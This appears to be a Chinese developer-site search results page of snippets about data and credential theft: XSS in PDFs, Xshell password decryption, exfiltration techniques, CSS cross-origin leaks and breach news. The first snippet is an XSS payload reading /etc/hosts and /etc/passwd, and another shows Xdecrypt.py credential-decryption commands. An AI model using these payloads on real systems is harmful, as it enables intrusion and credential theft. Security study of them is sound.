首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏Khan安全团队

    XSS 从 PDF 中窃取数据

    <script>x=newXMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>

    33910编辑于 2025-04-28
  • 来自专栏betasec

    凭证窃取 | Xshell凭证窃取

    本节小编将给大家介绍Xshell工具的凭证窃取方式,对于Xshell工具相信大家并不陌生,很多开发或者运维人员使用xshell连接远程的服务端,用于远程的配置和管理服务器。 相对于其它的远程连接工具Xshell算是相对安全的,因为该工具存储的账号密码使用过RC4加密的,但是当攻击者通过xx方式获取到目标主机的控制权限时,xshell端加密保存的数据也变得不安全了。 xshell一共更新的5,6,7三个版本,不同版本的xshell对存储的口令加密方式也不尽相同: version < 5.1 将"! 将计算机的用户名+SID倒序的字符串的SHA-256值作为RC4的密钥key xshell在默认安装的情况下,保存的账号密码是存储在了sessions文件夹中,默认安装的情况下的路径: XShell 5 Xdecrypt >>> python3 Xdecrypt.py >>>python3 Xdecrypt.py -s 1001-214154511-7660477841-6187249923-12-5-

    1.3K40编辑于 2022-12-11
  • 来自专栏网络安全

    攻防实战:数据窃取技术详解

    网络犯罪分子攻击公司的目的各异,但多数情况下最终目标是数据泄露,即将窃取的敏感数据在暗网出售或公开。 通常涉及持续的数据发送和接收。三、基于常见网络协议的数据窃取技术#####A.TCP套接字窃取(TCPSocketExfiltration)原理与适用场景:直接利用TCP套接字建立连接并传输数据。 **受害者机器准备并发送数据**:假设数据在`task5/creds.txt`。 task5/`目录内容到标准输出。 DNS数据窃取(DNSDataExfiltration)DNS数据窃取是一种将敏感数据编码后,通过一系列DNS查询发送到攻击者控制的DNS服务器的网络攻击。

    56341编辑于 2025-12-31
  • 来自专栏全栈程序员必看

    成果被他人窃取_工作窃取模式

    大家好,又见面了,我是你们的朋友全栈君 什么是ForkJoin、ForkJoin分支合并、ForkJoin工作窃取、ForkJoin大数据求和计算 什么是ForkJoin? ForkJoin:分支合并 ForkJoin特点:工作窃取 如何让使用ForkJoin ForkJoin求和计算Demo 什么是ForkJoin? ForkJoin(分支合并)是jdk1.7之后出来的,并行执行任务,提高效率,用在大数据量场景下。 大数据:Map Reduce(把大任务拆分成多个小任务,怎么拆分用到了二分算法),每个小任务得出自己的结果,之后再把结果汇总,汇总的过程就是分支合并的思想。 ForkJoin特点:工作窃取 ForkJoin会把一个大任务分成若干个小任务去执行(任务是双端队列去存储的,两端都可以操作),然后再合并结果集。

    54530编辑于 2022-09-30
  • 来自专栏大数据文摘

    窃取450G的AMD内部数据,这些黑客可能只用了5分钟?!

    这个犯罪团伙声称,他们只是多试了几次员工密码,就轻松地登进了AMD系统,轻松窃取了450GB的数据,其中包括“网络文件、系统信息以及AMD密码”。 他们表示,早在1月的时候,就已经入侵并窃取了AMD的数据,为了证明所言属实,该组织发布了一个数据样本作为证据。 Restore Privacy检查了被披露的数据样本,这些数据包括一份泄露的CSV文件,其中包含7万多台设备,似乎属于AMD内部网络,以及一份AMD公司用户凭据清单,其中包括弱密码如password,P 如果情况属实,那么大概只需要5分钟密码破译,任何网络犯罪分子都有可能黑进AMD的内部系统。 本月早些时候,RansomHouse因泄露了来自非洲最大零售连锁店ShopRite的数据而声名狼藉。

    32530编辑于 2022-07-01
  • 来自专栏FreeBuf

    防范数据窃取从了解其手法做起

    数据窃取是针对组织攻击链中的最后一个阶段。攻击者窃取数据的技术可谓花样百出,网上也有大量关于数据窃取方面的技术文档以及工具。 工欲善其事必先利其器,防范数据窃取必须先熟悉其使用的手段。文中所提及的大多数技术涉及直接的内部到外部数据窃取。需要说明的是这并不是一个完整版本,如果你知道的更多,那么请在评论处留言并告知我们! Anon paste站点例如pastebin甚至是github,都为我们提供了一个数据窃取的简易通道。许多技术组织通常都会允许Github的使用。 X509证书可以被嵌入到二进制数据中,因此可用于传输数据。 www.wired.com/2017/02/malware-sends-stolen-data-drone-just-pcs-blinking-led/ 磁:ODINI和MAGNETO攻击可以利用计算机处理器产生的磁信号来窃取数据

    73530发布于 2018-08-21
  • 来自专栏安恒网络空间安全讲武堂

    用css绕过同源策略跨域窃取数据

    font-family属性的值,即单引号内的,所 以这也将成为一个前置条件,那就是要窃取数据中不能同时出现单双引号。 最后我们就 可以通过这样的方式完成跨域窃取敏感信息,数据甚至可能包含csrf所需的token,或者更敏感的个人信息。 攻击的一些前提约束 要窃取数据必须在payload1和payload2之间。 要窃取数据不能同时存在单引号和双引号,否则会破坏解析的结构。 (数据最后要被解析为css一个属性的值) 要窃取数据不能包含换行符(css值不支持多行) 这些条件在现代的编码风格下是很难遇到,尤其是不允许出现换行。 我们需要一个可以写任意字符串的属性,这样才能导入我们要窃取数据。”font-family”是最佳的选择。

    1.5K90发布于 2018-02-06
  • 来自专栏网络安全

    DeepSeek 恶意 Python 包,正在窃取你的数据

    研究人员发现,Python 软件包索引(PyPi)中植入了恶意的、模仿 DeepSeek 的软件包,这些代码实际上携带着信息窃取程序。 研究人员指出,“deepseeek” 和 “deepseekai” 在执行时会释放信息窃取程序,以窃取敏感数据,包括 API 密钥、数据库凭证和权限。

    51910编辑于 2025-02-06
  • 来自专栏子云笔记

    窃取分析PE签名

    Stealing Signatures and Making One Invalid Signature at a Time.https://github.com/secretsquirrel/SigThief从二进制文件中获取签名并将其添加到另一个二进制文件python sigthief.py -i 360.exe -t cmd.exe -o 361.exehttps://blog.didierstevens.com/programs/authenticode-tools/分析PESig是一种检查PE文件

    69940编辑于 2022-09-13
  • 来自专栏大数据文摘

    窃取用户数据”?看阿里如何应对

    支付宝与付费通终止合作后,网上突然出现很多支付宝“窃取用户数据”的言论。商务合作终止固然遗憾,但“盗窃”的罪名更重大,尤其是涉及到大家非常关注的数据问题。 毫无疑问我们非常看重数据数据将会成为改善全社会商业环境的重要资源,我们坚信数据的力量和价值。阿里巴巴从五年前就确定“开放的数据平台”作为自己的战略目标,并且重兵布局云计算和大数据。 基于这样的理解,我们认为数据的商业价值在于运用而不在控制,我们认为数据只有在交换、分享中才能发挥更大的价值,数据会越用价值越高。因此,我们并不担心获取数据的途径,更绝不会用不光彩的手段去获取数据! 如何有效地发挥这些数据的价值,建立一种数据交换以及数据标准的能力,我们的思考才刚刚开始。 5、有一种说法是,因为担心数据被他人获取,大商户或机构都会倾向于使用自己的支付工具,保证对自己数据的独占。我们怎么看待这个问题?

    69950发布于 2018-05-21
  • 来自专栏火绒安全

    AgentTesla病毒解析:利用钓鱼邮件窃取终端隐私数据

    当用户被诱导点击运行病毒后,病毒即会窃取用户终端上的隐私数据并上传C&C服务器。 ͼƬ2.png AgentTesla病毒样本通常使用混淆器,通过数据加密、代码加密、控制流混淆等多种混淆方式藏匿自身病毒特征,对抗安全软件查杀。 AgentTesla病毒的主要危害是窃取用户终端中的隐私数据,隐私数据包括用户浏览器登录凭证、FTP软件登录凭证、电子邮件登录凭证、键盘记录信息、屏幕截图、用户系统配置信息等。

    73420编辑于 2022-05-20
  • 来自专栏红队蓝军

    域内令牌窃取

    本文就通过令牌窃取进行研究,并希望知道其中的具体细节。

    1.6K20编辑于 2023-02-25
  • 154个数据库被黑客窃取?ASML回应

    该黑客声称,此次窃取的信息涵盖多类敏感数据,包括磁盘加密密钥、用户数据(用户名/密码)、软件信息以及特定设备的详细信息。 如果消息属实,这将远远超出一般的客户数据泄露事件,将会对ASML公司带来严重的负面影响。这意味着攻击者攻破了ASML的安全系统,并可以访问ASML公司高度敏感的数据。 不过,ASML在最新发布的声明中否认了公司遭黑客窃取数据的说法。 “ASML注意到2026年1月6日在BreachForums上发布的一篇帖子,该帖子声称公司信息被泄露。 所提及的文档中没有来自ASML的数据。”ASML在声明中写道。 第三方的安全研究团队经过分析后也认为,黑客“1011”兜售的所谓ASML的数据实际上毫无用处。 此外,研究人员还发现,黑客“1011”与本周早些时候宣布NordVPN数据泄露的攻击者是同一人。NordVPN公司随后也否认丢失任何数据,该公司代表称这些说法“不实”。

    8510编辑于 2026-03-19
  • 浏览器“隐私”扩展被曝窃取AI对话数据

    浏览器“隐私”扩展被曝窃取AI对话数据据Koi Security的研究报告,四款声称保护隐私的流行浏览器扩展程序实则背道而驰。 这些恶意插件一直在窃取超过800万用户的聊天机器人对话文本,并将其发送回开发者。 达迪克曼解释道,数据收集功能通过硬编码的配置标志默认启用。“没有面向用户的开关可以禁用此功能。停止数据收集的唯一方法是彻底卸载该扩展。” 他说,“要么是审核没有检查从某中心自家AI产品(Gemini)窃取对话的代码,要么是检查了但不认为这是个问题。” 该政策允许在有限场景(例如安全或业务所有权变更)下将数据传输给第三方,但这些场景不包括将数据传输给数据代理。

    32110编辑于 2026-01-01
  • 来自专栏码匠的流水账

    线程池工作窃取实例

    ForkJoinPool主要用到的是双端队列,不过这里我们粗糙的实现的话,也可以不用到deque。

    1.1K10发布于 2018-09-17
  • 来自专栏FreeBuf

    基于Session的身份窃取

    二、Session Hijacking 与盗取用户名、密码登陆用户帐户的方式有所不同,Session劫持是一种通过窃取用户的SessionID,使用该SessionID登录目标账户的攻击方法。 现在我们要模拟Session劫持的过程,假设通过某种手段窃取到了Chrome的SessionID,并且将Firefox中的SessionID修改为刚才窃取到的Chrome中的SessionID,点击确定发送数据 可以看到,虽然换了浏览器,但是只要获得了SessionID,即可窃取到有效会话。如果交替刷新两个浏览器,操纵的其实是同一个计数器。 常见的应用场景有窃取用户登录后的邮箱、博客的SessionID,对用户账户进行非法登录,盗取隐私信息。 四、防御对策 部署HTTPS防止SessionID被窃取。 设置HttpOnly属性防止XSS攻击。

    4.4K91发布于 2018-02-24
  • 来自专栏CSDN迁移

    信息安全课程——窃取密码

    信息安全课程——窃取密码 一、 一、 安装ubantu16-64 Desktop版本 通过XShell连接虚拟机。 */ iphead->ip_hl = 5; //4位 ip首部长度 iphead->ip_v = 4; // iphead->ip_tos = 0; //8位 服务类型 /* 为icmp头部填充数据 */ icmphead->icmp_type = ICMP_ECHO; //类型为icmp回复报文 icmphead->icmp_code = 0x5B; ,代码字段设置为0x5B*/ #define MAGIC_CODE 0x5B #define REPLY_SIZE 36 /*"GPL" 是指明了 这是GNU General Public License 在这里,我们 *应使用ICMP_ECHO数据包,其代码字段设置为0x5B * * AND *数据包已足够 *标题后的空格,以适应4字节的IP地址和 *用户名和密码字段是最大值。

    84320编辑于 2022-10-25
  • 来自专栏安恒信息

    NSA通过恶意软件感染5万多台计算机,窃取各种敏感信息

    由爱德华·斯诺登(Edward Snowden)提供的文件显示,美国国家安全局(以下简称“NSA”)通过恶意软件感染了全球超过5万台计算机,以窃取各种敏感信息。 这一介绍显示,NSA在全球超过5万个地点开展了“计算机网络开发”项目。这一项目通过安装恶意软件,以秘密方式渗透计算机系统。 过去多年中,英国情报部门国家通信总局(以下简称“GCHQ”)在Belgacom的网络中安装了这种恶意软件,以监控该运营商用户的电话和数据流量。 到2012年中期,这一数字已经翻番,达到5万台。 对NSA而言,网络情报活动正越来越重要。计算机黑客的雇佣成本较低,并使NSA获得了一些通过其他方式无法获得的信息。

    77670发布于 2018-04-10
  • 来自专栏FreeBuf

    索尼PS5曝两个内核漏洞,可用来窃取根密钥

    继Xbox主机曝出外挂后,索尼PS5也在同一日曝出两个内核漏洞,攻击者利用这两个漏洞窃取了PS5的根密钥,这引发了大众对游戏主机的新一轮担忧。 FailOverFlow黑客组织在推特上发布了一条状态,晒出PS5固件的对称根密钥。之前该组织还在推特上公布了其他几个主机的越狱方法。 该组织声称已经从软件中获得了所有PS5的根密钥,并强调是每台主机。 Andy Nguyen表示,他已使用该内核漏洞访问了PS5的“调试设置”,但他不打算公开披露该漏洞。 △ 谷歌安全工程师Andy Nguyen推特截图 据Zecoxao称,TheFlow利用PS5的分享功能分享了一张屏幕截图,图片上就是“调试设置”菜单。

    57320发布于 2021-11-23
  • 来自专栏数据猿

    美国大规模窃取全球数据 该用什么来保障中国数据安全?

    斯诺登曾说不想生活在一个一言一行都被记录的世界,但近十年来,美国的窃取数据行动不断被曝光,中国的数据安全又将走向何方? 美国的窃取数据丑闻不止于此,自2013年斯诺登曝光棱镜计划开始,美国的数据窃取行为就如同浮出的冰山一角,其水下的庞大组织逐渐曝光。 2017年5月12日,就有不法分子改造“永恒之蓝”木马程序勒索中国和整个欧洲的多个内网,机构必须支付高额赎金才能解锁文件。 其次是商业上的潜在攻击,数据成为商业角斗的工具。 Tik Tok在2021年9月底已经全球拥有超过10亿活跃用户,成为第七个达到这个数字的社交媒体平台,并且仅仅用了5年完成10亿用户的增长。 中国信创产业政策 可以预见,接下来围绕数据安全的全球攻防战,将愈发激烈。美国系统性攻击他国网络、窃取他国数据的行为,将会持续进行。

    1K30编辑于 2022-09-04
领券